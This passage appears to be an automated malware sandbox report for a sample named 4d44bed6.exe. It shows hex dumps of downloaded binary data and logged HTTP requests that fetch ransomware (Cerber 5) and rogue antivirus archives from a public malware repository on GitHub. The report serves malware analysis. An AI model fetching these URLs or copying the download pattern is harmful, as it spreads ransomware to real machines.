                                                                                                                                                2022-09-29 12:51:35 UTC13292INData Raw: fb 4b 35 b6 62 90 3a f3 9b d7 aa b2 04 5a a8 bd 3c be 11 82 d7 28 af e6 f1 0e 32 88 51 29 9a d1 35 26 0b 43 4f 5f 72 d3 cb bb 6a 1c 8a 21 74 8f e8 4a 35 3d 41 55 46 cd b2 51 f3 9a c0 05 bd e3 f0 3e 71 69 90 82 55 54 1e 8e ed 9f ef 9b 24 52 ab 7e 4c 8b 07 6d 78 2f 1d 5e 30 0c 34 4d 06 27 42 82 77 8e 34 31 a8 e3 9a be 3c cd 62 e1 93 9f 3f 73 44 b6 6d b9 f4 91 be 78 16 2f 62 94 37 ee 55 92 ae d1 f4 f4 ea fb 46 22 91 28 7d 0d c9 22 9c 3c 99 0d 30 8b ec 8a 10 5f ff 30 c1 5b d5 24 c5 32 39 10 2c 6b 82 22 1f a0 e0 f1 a9 12 e0 c2 1e 41 90 93 39 50 ce 69 e2 42 57 9d 07 a4 20 14 b1 f2 33 9b 0f bd 71 ba cd 8b 71 16 07 e4 7a 75 34 1d 81 14 94 a0 eb 70 6f 08 f5 f9 b9 5e 71 86 41 00 0a 7d a6 cb 32 f8 96 b5 ac 14 ab bd de 9e a8 6d 43 51 44 ce eb ed 11 cd 22 0c 88 4e d0
                                                                                                                                                Data Ascii: K5b:Z<(2Q)5&CO_rj!tJ5=AUFQ>qiUT$R~Lmx/^04M'Bw41<b?sDmx/b7UF"(}"<0_0[$29,k"A9PiBW 3qqzu4po^qA}2mCQD"N
                                                                                                                                                2022-09-29 12:51:35 UTC13308INData Raw: 50 74 bb db d7 bc 70 bc 80 50 48 6e 3a 0b 1c 96 7f 82 85 04 9f 3a ce f0 51 1c 3a 9b 8d ef ad e7 5e 08 51 87 65 be 93 88 69 eb 93 0e 4c a5 eb 43 1b 74 7b 92 67 3e 1e 7f a4 1e b9 19 34 a3 4e 5d f1 1b a0 42 0b 6d 5a 7b 84 f6 42 7e 33 84 03 70 07 38 57 34 b0 72 0c bd ad 14 66 a1 11 d3 b8 f4 29 33 dd 0d 3a e2 38 fd 1e df 19 4e 4d 89 3a 46 d1 c1 f2 3a cb 59 6f 8d c6 df 0c ed 9c ea 54 be 34 25 17 af 61 63 c7 10 e7 10 d1 c6 75 5c f7 13 7c db 27 96 05 fc 61 c9 4d fd 89 8e 3d 3e be 9b 23 20 25 bb 1e 56 73 f3 eb 8b 4e f6 cb 7f dc e7 53 04 61 84 34 b4 7c 8a f4 95 5c 01 55 18 dd 0b 05 f4 58 b0 15 45 9c 6f 8b b4 07 24 c7 c1 b1 65 fb 66 d9 cc b6 cd 05 9e f9 0c fc 2d 5f b7 aa 54 f8 f4 1a e4 eb bd ef 20 6e 0b a7 1f f1 d7 c7 e3 70 2f 44 ab f3 17 6e b9 d2 18 e8 19 4a eb aa
                                                                                                                                                Data Ascii: PtpPHn::Q:^QeiLCt{g>4N]BmZ{B~3p8W4rf)3:8NM:F:YoT4%acu\|'aM=># %VsNSa4|\UXEo$ef-_T np/DnJ
                                                                                                                                                2022-09-29 12:51:35 UTC13324INData Raw: 79 e1 7c 42 e3 49 f4 62 0f 34 c6 4e 9e 70 07 54 a7 86 15 53 0c 9b c8 5d ae 5f d2 88 d2 f3 dd 37 64 3e 04 b8 e5 d6 a1 f4 bc 63 a8 0a bd 5b 2f 47 a6 a0 dc 58 00 a6 33 41 f8 bc 82 fd b4 29 bf fd 1e 00 65 5a fb 2c 70 ed 50 11 f6 2b 12 02 cc 1d b1 ed e4 76 73 58 d4 78 c2 4d 36 d4 62 5f 45 fe 3a 0d 34 02 2a 23 76 e0 c4 8d 7e e9 5a c4 d1 fc 0e fc f6 b2 5a 77 8f 56 f7 76 79 60 18 92 84 ec 69 64 e5 49 25 d9 80 16 41 7d c3 cd ab b0 bb 99 48 ac 32 43 e4 0c 9b 39 40 3f ff 8a 12 df 6d 42 12 fa 93 bd e2 b2 ae a4 28 ca e3 42 51 52 ab 4d 2c ae 73 7e 29 73 b0 95 09 75 c1 92 90 67 c6 3d 18 5c 14 f8 17 b9 3b a7 6f 64 49 2f 15 e1 cf 48 5a 2c 4a 65 54 2e d6 da 13 24 62 f3 80 a4 ef 20 2d 54 20 12 61 cc 71 9b 2a 22 3f cf 06 39 4b 26 eb 91 f8 b4 d3 da 3d b1 7f 5d 73 17 55 e9 5e
                                                                                                                                                Data Ascii: y|BIb4NpTS]_7d>c[/GX3A)eZ,pP+vsXxM6b_E:4*#v~ZZwVvy`idI%A}H2C9@?mB(BQRM,s~)sug=\;odI/HZ,JeT.$b -T aq*"?9K&=]sU^
                                                                                                                                                2022-09-29 12:51:35 UTC13340INData Raw: 14 bb e8 81 3a bd c3 69 65 8f c7 da 09 87 0f 1f 58 df 06 6e bf 65 31 b8 01 2b 9e bc 6c bc 31 31 6c 8e 77 e3 fb a1 1f 42 98 6f 46 42 b8 a4 c9 d4 e4 5f 93 f3 c6 4b de 1c 97 33 03 a2 ca 89 20 9f 54 e4 2c d2 70 47 a4 76 86 22 01 38 e4 30 df e8 c3 17 c9 50 53 7d 3f b3 73 d1 b8 7f bb 5a fa f7 9b eb f6 03 03 1e af c4 1f ca e8 51 f9 28 37 1e dd af 46 5b f5 e4 a9 19 c2 54 17 56 f3 ad d8 97 cb a1 39 74 44 e1 ad 1b e7 58 64 3d 7a ca 17 78 88 ca fc f2 de a9 11 ee c2 cf 47 bb 00 a9 7a 55 99 30 01 98 c1 11 9a 89 47 b5 a3 7a 64 ac 32 5c 81 28 7d 1d a3 34 ec db 23 39 6d 8f b3 d2 a4 79 50 f8 1c ab 6f da 61 74 8d fd 67 63 5b 2e 3e 96 eb e0 6d 03 93 ee ca 96 c2 20 f5 17 fe f8 6b 64 3e 4f 64 90 f6 a7 39 38 05 32 1e e7 c4 af f9 a1 74 b9 93 91 a2 4a f6 d2 e1 4d a4 4c 58 d2 bf
                                                                                                                                                Data Ascii: :ieXne1+l11lwBoFB_K3 T,pGv"80PS}?sZQ(7F[TV9tDXd=zxGzU0Gzd2\(}4#9myPoatgc[.>m kd>Od982tJMLX
                                                                                                                                                2022-09-29 12:51:35 UTC13351INData Raw: a3 0e 79 91 0b e9 35 b1 97 4e d8 e1 34 87 72 66 f7 7a ab e6 a1 11 bc 4a 95 68 15 a0 66 ab 59 d7 04 d1 76 38 e4 40 1a 2b 00 f1 f3 ea ad 76 91 d8 e2 31 14 f1 ce 3c 94 1a 14 b8 9a 5d 36 30 f0 94 50 1c 6a a4 ff a6 fa 08 01 e3 24 e0 1b c7 c1 fd ac 2c 0d 4a 4e d0 ae 14 37 31 2e 52 59 62 3d 14 44 10 87 6f f8 14 b5 2f d8 cb 1f 01 08 91 c3 b5 96 c2 ac 6d 44 52 15 fe a3 28 81 60 94 8a 8d 5a c8 e9 d0 88 b2 c9 9f cc 37 e6 07 54 9f 0e 35 3f 29 54 73 86 5a 75 8a 6d e6 c2 cd 7d 1d 03 b9 31 40 d2 e9 0b 92 4d fa 2a d9 61 50 f3 e8 fe f6 0d ac 99 ab e9 3d 03 d8 5c 0a 1d b7 bf 29 a6 9e 16 6e 5f ed 7d d0 b5 a1 cc ca 30 0d 95 d8 e6 04 8f 95 be 84 46 af df 66 8a ba 8f 36 4f de f5 94 ba b5 d5 81 7c 7e 27 a8 40 9c ba 1b 02 80 49 c0 af 89 c8 8f b7 ab e5 e8 a5 56 64 6b dc 8c 45 f6
                                                                                                                                                Data Ascii: y5N4rfzJhfYv8@+v1<]60Pj$,JN71.RYb=Do/mDR(`Z7T5?)TsZum}1@M*aP=\)n_}0Ff6O|~'@IVdkE
                                                                                                                                                2022-09-29 12:51:35 UTC13367INData Raw: 82 33 6a 44 fd ce 53 d3 e3 d6 f2 ce 36 b6 0c 97 39 62 5c ac b7 cc c4 8e 7c e0 b5 dd 76 b6 f8 84 2f f7 d0 50 17 fb 90 a9 a9 5f 90 8a e3 ad 9d a7 1c 29 93 f6 b7 79 25 9f c8 47 fa e1 3b 9e 0d 08 c3 1b d3 31 2d 95 7b 2d b9 f9 34 7b 8b 51 79 5f d5 e6 bc 9a 98 37 3e f1 9a 0d b3 1e 77 c1 ad f3 8d dc 0a c2 84 6b fc f9 e1 24 13 46 c6 f2 bb 80 06 38 b3 46 65 b9 43 e7 f5 ba 0b 3e 04 96 bd 48 05 dd 37 32 82 54 66 da 56 27 10 b0 36 9d d8 d5 64 e0 45 a7 a3 d7 9f e6 a7 cc e2 55 5d f2 58 54 6a 3d b7 3e 96 35 7e 0e fa 82 63 98 5a 38 b0 ec c6 d9 f1 07 09 7d ad f8 8e 6c 4d 91 49 43 e8 26 b0 74 11 61 c2 73 fe d6 89 52 d6 35 e2 1a c2 82 b6 c0 bf 30 17 6c b1 e2 0c 4f 18 53 ad 3a c7 6e 40 12 1d 44 1c e2 2c 33 7d f2 12 ac b2 9b c2 c4 24 49 52 95 84 53 d5 8b f5 71 cb 21 72 fe 8b
                                                                                                                                                Data Ascii: 3jDS69b\|v/P_)y%G;1-{-4{Qy_7>wk$F8FeC>H72TfV'6dEU]XTj=>5~cZ8}lMIC&tasR50lOS:n@D,3}$IRSq!r
                                                                                                                                                2022-09-29 12:51:35 UTC13383INData Raw: ca 9f 16 a0 a9 58 91 db f1 f5 88 87 d1 72 bb a8 70 82 db ed cf 85 b4 06 db fd 67 8b 4e 08 89 8d 5f 80 71 07 05 16 60 d5 a0 28 43 e0 cd b8 d5 54 c8 1e a2 9c 7f ab b4 c4 21 4e 41 83 5f b5 00 69 39 e7 4a b5 2c b1 d0 62 6e 95 2f 5a ff 03 95 45 0d 4e d3 66 b7 fe db 63 e3 e3 e2 f0 b1 b4 bf 2c 43 12 9d d5 43 18 fc 47 07 ea 88 1f d7 a3 c2 15 82 d7 30 2d 95 1a 26 2b 1d e5 9a 61 c5 ce 80 0b 88 66 92 55 d1 4d 8c a9 7c c3 2b 82 1a 14 27 07 1a f7 7c ff da 73 ed 75 ee a0 fa 6c 04 c5 67 66 17 16 5c 11 e2 8e 87 e5 04 74 a2 c4 af ee ef 5b df 09 ca 82 fa dd df fc 50 e8 e2 dc 51 86 0d 37 5b 84 6b 52 c5 b7 94 40 ba e7 2d b1 7c 22 9a 98 ee 1d de 15 90 e7 56 76 9c 36 67 a6 3a f3 95 61 9c d2 da 96 60 e6 6d d4 43 b9 bf e8 71 9b 37 7b 14 f5 30 9c 55 52 9b 64 27 d6 c4 59 b4 27 a4
                                                                                                                                                Data Ascii: XrpgN_q`(CT!NA_i9J,bn/ZENfc,CCG0-&+afUM|+'|sulgf\t[PQ7[kR@-|"Vv6g:a`mCq7{0URd'Y'
                                                                                                                                                2022-09-29 12:51:35 UTC13399INData Raw: 64 ee 01 e3 8b a3 a1 16 aa d9 b0 58 18 de 49 18 75 1c 55 55 da 5d ab 40 ed 0c e4 5f 0a 89 ce b0 02 85 a9 b6 90 6a e6 0f fe aa 84 79 c5 66 7e c7 46 31 2a d7 c7 6f 1c e5 17 78 f5 9e 9e 9d 60 05 4b 02 22 46 c6 95 52 e0 84 63 e0 c7 d8 b4 e4 e3 b2 d5 c9 dc 57 f2 63 7a cb 3c 16 7c 7c 2d 76 bd 91 c3 0e 5c 55 90 61 36 71 4a ec da 1f 72 62 55 2d 79 23 03 9b 90 31 69 50 0f da 04 87 a6 25 2c 1c b4 33 bc 0b 97 18 03 cd a4 5b cb ee 80 1c 7e c6 09 0e cd 4c 14 aa d8 f0 1c 85 52 65 a3 41 81 78 47 aa f3 98 19 10 61 bf 42 14 cc 17 f3 31 7a 3a 2e f6 a1 b6 74 17 3c 50 fe 6e e8 42 f5 0b e0 f9 ba 95 4a 07 ed 28 4d e0 0e 0b dc 1b 99 a8 3a 44 7b 75 d8 71 e9 4b 1a c0 f4 6b ad 44 35 48 32 34 0d 60 75 5e ff e7 22 60 8b 1f d9 9f 6e 40 54 39 e0 4f 0c 33 6c d6 db 4d 55 33 a9 73 33 fe
                                                                                                                                                Data Ascii: dXIuUU]@_jyf~F1*ox`K"FRcWcz<||-v\Ua6qJrbU-y#1iP%,3[~LReAxGaB1z:.t<PnBJ(M:D{uqKkD5H24`u^"`n@T9O3lMU3s3
                                                                                                                                                2022-09-29 12:51:35 UTC13415INData Raw: a9 d2 12 fe 30 b2 c4 e1 75 f7 9e 7c 84 a7 3c 6c ae 4e 6d 8e d0 d4 60 a0 3c ca 8f f6 ff 6d c9 7f 76 9f 98 2b 21 54 0e f0 6f 8b 11 87 41 f5 5f c1 a2 fa 29 3b f5 d3 c3 6a 74 d4 49 7c 9c 95 ab a8 08 06 a5 da 14 c9 eb fc c0 77 8a 2b fa 8e d5 23 86 8e 5d 10 4c 16 cd 32 1b 13 1f e2 77 bd 29 77 93 c7 a4 b2 dc 00 fd 4d 34 62 6a 33 b8 a6 3e d1 3c 66 a0 b0 31 92 6c 0e 66 49 27 7a 2f 9d d8 d6 bf 09 a5 bb ad 1f e0 2e 00 b6 fe db b8 55 d4 e7 ae d0 36 ed a3 63 15 89 b7 77 e8 48 90 df 71 69 e0 ba 9f 40 44 f4 34 14 dd 26 e5 2a 38 87 e4 33 1b 45 f6 e3 88 47 a3 5d c0 f1 08 75 5a 18 58 fb 74 55 4f 0e 91 d8 3b 3a ba 3b 6b d5 5e 2b 96 82 a9 74 93 37 9b 54 3c e2 db 43 47 23 ca fd d9 4f 47 98 2e b2 6d ad 6d 3a bf 4a 9a 0f e9 62 b1 c4 6b e1 86 29 8f 1d fd 9b b4 e2 a4 22 88 48 65
                                                                                                                                                Data Ascii: 0u|<lNm`<mv+!ToA_);jtI|w+#]L2w)wM4bj3><f1lfI'z/.U6cwHqi@D4&*83EG]uZXtUO;:;k^+t7T<CG#OG.mm:Jbk)"He
                                                                                                                                                2022-09-29 12:51:35 UTC13431INData Raw: 83 b0 83 c8 0e 65 ba 00 05 87 16 f2 c1 e4 a2 6a 2a 1a 2a 6b bd 61 8f 19 12 d8 aa af 05 df 80 d4 fb 30 89 e4 96 5c 36 01 fe 57 82 7a 97 e4 00 e8 c9 ee 59 e7 a5 87 4b 58 a4 7b ad 99 a2 48 bc ce 64 9a 06 74 db 8e a5 43 2d 9e 25 8d d9 39 94 58 a5 26 dd b3 50 51 f9 33 77 cd d0 6d fa 84 74 9e d5 f6 6d 28 b0 90 c8 67 04 23 3a 29 2c bf 84 c3 1f 2d 0a c5 38 87 88 ac d4 fb 7f 89 c2 02 fb 94 a2 1f 84 0f c5 9a c7 8a f4 c1 39 24 d1 6b 28 88 1b 7b b9 ef 82 5d 41 82 e4 d9 17 cc f3 ed 1f 2b 81 f0 ce 79 77 1e cd 73 0a 28 5d 72 ac cc e0 5e 8b e0 8c d9 aa f4 f9 93 4b df ec 5b e0 56 20 a8 b5 66 f2 d5 0c 5b 93 1e 88 9b ce 34 fc 01 e2 0b d1 e1 cf 9d be db b1 09 3d 36 5b cc 1d 4b 3c 27 29 c5 20 bb a1 8b 55 8d b8 97 7a 7a d7 3b fc 85 d4 a4 8e 4b 09 c0 46 00 3d 3e 24 f7 f0 25 f7
                                                                                                                                                Data Ascii: ej**ka0\6WzYKX{HdtC-%9X&PQ3wmtm(g#:),-89$k({]A+yws(]r^K[V f[4=6[K<') Uzz;KF=>$%
                                                                                                                                                2022-09-29 12:51:35 UTC13447INData Raw: 5f d9 14 b4 9f 74 52 54 7b df e9 d2 f8 a6 40 40 c2 ea aa 29 34 0a a5 e0 5d 17 03 72 af e1 09 a9 e3 2d ec 10 05 3d 93 18 4c b0 c9 a2 18 0c ec 8c 76 67 b0 b4 4f b5 77 fc 22 55 f7 2c 68 fb e0 77 2c 8b e3 a3 21 a1 44 b9 e4 cd d4 e4 89 7c 4e 7e 46 35 99 d1 45 3d 38 a4 2a ca 97 08 c2 15 73 44 f0 e0 d5 a3 11 08 ba 68 16 56 9b e0 13 c1 a5 49 78 4b 69 a6 ab 22 8c aa 91 e7 06 b9 50 09 26 ba b8 fb 90 df c2 2d 88 03 e5 54 96 2f b6 b3 68 c7 4b e2 2d 09 49 81 e8 14 ba 2b 61 cf 43 15 b3 ae b4 af a3 36 9d 6d 24 02 e9 7d 46 80 ec 4e 96 b7 99 72 3d 71 f1 bc 4e 62 65 a6 4c b2 df 06 3b e0 42 c8 37 08 77 50 79 d3 b4 cc 5c ae ac bc 81 07 fc 1f 14 79 65 31 68 bc 68 be f5 06 99 d0 a1 e0 d4 17 32 60 2a e0 e8 27 8d 72 72 09 67 d5 e8 d8 e9 51 ea df 1c e1 d4 d8 18 91 b0 d5 a3 c1 55
                                                                                                                                                Data Ascii: _tRT{@@)4]r-=LvgOw"U,hw,!D|N~F5E=8*sDhVIxKi"P&-T/hK-I+aC6m$}FNr=qNbeL;B7wPy\ye1hh2`*'rrgQU
                                                                                                                                                2022-09-29 12:51:35 UTC13463INData Raw: a3 36 a7 24 6f d9 eb 5a 79 66 76 b2 7e 2e 65 9d 8c c6 01 ba 37 f0 82 6f ea 40 cc 35 c3 97 b1 93 05 d5 67 b6 b2 48 4c 6e 07 72 6f 37 85 a6 f8 6e 49 37 11 f0 f9 b5 dd 22 1e 3f 90 c6 e9 0e cd 28 98 14 0a 40 dd 38 0f b3 35 cc f1 b6 1a b6 46 bd 6b ab 87 c0 0f 6b 48 e1 81 93 fe 33 fc 07 7b a1 10 1c 14 d6 46 38 35 42 9d d3 50 d6 6f 5d 9b a1 74 1c 9c 85 a4 be 5d 8b c6 34 ea 49 7b 04 3a 51 d9 64 b7 8a f7 47 f6 64 b4 98 9c 7f 13 82 8a aa 84 3e 6e 2a 24 6c 45 ba 17 0c 27 a5 e6 cd bb 7f 61 ed e2 80 a3 9f 84 dc b2 4d 69 fd 3d 7d 54 0e 9c d3 56 29 c7 46 a2 53 31 60 0c bc 4e 3c 17 9f 7f 0a 14 f0 92 db 95 f5 32 8e 86 f8 46 b8 b6 03 90 87 2f 48 e5 28 af 85 a5 fe 6f db 43 1f 29 b9 e7 53 87 d7 81 c8 87 c5 c5 4a 87 67 1f f5 40 bd ca 0e 27 a0 04 79 af 26 e9 25 c5 54 64 f2 33
                                                                                                                                                Data Ascii: 6$oZyfv~.e7o@5gHLnro7nI7"?(@85FkkH3{F85BPo]t]4I{:QdGd>n*$lE'aMi=}TV)FS1`N<2F/H(oC)SJg@'y&%Td3
                                                                                                                                                2022-09-29 12:51:35 UTC13479INData Raw: 8b 4c a4 f1 34 ac 8d 0c 2a c9 b0 47 6b 08 2b 38 4a 5a 36 15 ec 0c 3b 33 8c 3a 1b 8d f5 11 7b d1 41 05 56 16 92 b9 2e 87 e0 dd ab 3b fd 13 42 2c 2f 1f e3 cc 7a bd 0d 3c fb 9c b6 14 43 3e 60 ef c4 e6 4a 76 38 b2 f8 af 68 52 2e 66 5b b0 3e 38 e9 3b 6c c2 57 13 3d 5c 66 8f 03 dc 23 02 a7 a4 5a 2d 23 e7 a1 ff 25 ca ea 8c 90 77 43 97 da 5c 42 1f 9c 5a c7 a8 9f ad e8 2a 73 54 18 ef ff ff 22 fb 39 a7 59 07 ed bc f0 a6 53 a7 69 6e 22 2c e9 fe c7 72 0d 8e 61 f6 17 ed e4 df 78 77 23 bc fa cf 6b 8b 34 63 4d 5e 24 dc de b8 c3 b5 1c 3d 65 33 27 57 f8 56 33 1a a6 6c c6 10 0d e9 c5 88 56 e3 91 e1 8a 03 c4 12 a2 c0 d3 98 12 45 87 b7 08 6f 37 ad 14 e9 46 f5 8e 3e 4d 06 33 4e 65 ab 64 e5 92 ab 3b 97 3b d6 19 0a 14 c6 81 57 9c d4 be 50 a2 ef 66 00 dd 3e 52 4e 1e 52 3a da 79
                                                                                                                                                Data Ascii: L4*Gk+8JZ6;3:{AV.;B,/z<C>`Jv8hR.f[>8;lW=\f#Z-#%wC\BZ*sT"9YSin",raxw#k4cM^$=e3'WV3lVEo7F>M3Ned;;WPf>RNR:y
                                                                                                                                                2022-09-29 12:51:35 UTC13495INData Raw: 2a 99 6e 02 c9 84 5f 42 72 db ca 53 9e 53 85 50 e9 b7 6b 3f 2d 66 64 91 f2 19 b2 27 0c 31 b7 02 2c 5c 68 a0 e5 7b 04 f4 06 de 0b 6d 1d a8 93 ca 4b 63 79 ae fd 09 c1 81 40 1c 9d cb b0 ba 69 0e 9b e0 82 a9 db 48 dc cb ca 16 8f 7f 8b 4d 60 18 7e 0b c4 7a de 66 90 58 f5 99 03 f6 b5 48 54 0b bd f7 5c 91 a6 c2 9c 48 92 fb 58 d4 7c 2f 28 9a 5e af 28 5e e6 62 d9 c4 80 4b 33 91 10 79 09 2a 5e 06 cf 70 db e9 3b b0 d5 70 b5 39 b0 63 4c 99 5d e5 4d ff b3 d8 52 5b ad 59 ef fd e2 17 42 71 8a 61 51 d4 61 11 f8 0e 53 70 96 92 7c 1d f4 1d 34 f7 d5 3d a9 6e d2 c5 58 1a b2 f5 1e e2 5e e4 64 df 1b 27 d0 08 9a 60 f1 dc 48 11 f1 92 9b bf 0e 26 98 84 c0 22 12 3c 66 ab 6a ba b2 e0 53 85 4b 85 a8 6c f3 de 6e f3 3f 92 e7 e2 eb 2c a5 4e bb 8d 5b dc a0 0f d6 0e 9c 9c a2 b6 d5 80 93
                                                                                                                                                Data Ascii: *n_BrSSPk?-fd'1,\h{mKcy@iHM`~zfXHT\HX|/(^(^bK3y*^p;p9cL]MR[YBqaQaSp|4=nX^d'`H&"<fjSKln?,N[


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                4192.168.2.549704140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:17 UTC513OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:17 UTC513INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:11 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:17 UTC514INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                40192.168.2.549740140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:36 UTC13497OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:36 UTC13498INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:36 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:36 UTC13498INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                41192.168.2.549741185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:36 UTC13500OUTGET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:37 UTC13500INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 2580873
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "9adcf2d9882d51d3dfdb11b5740aa53cd370781402b00f1834dcef303c637853"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: BC88:67BA:7CF8:C44B3:63359353
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:37 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6964-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455897.909622,VS0,VE163
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 6fcd5a25457d78005c1dbf8a162ce0f4b6faded0
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:37 GMT
                                                                                                                                                Source-Age: 0
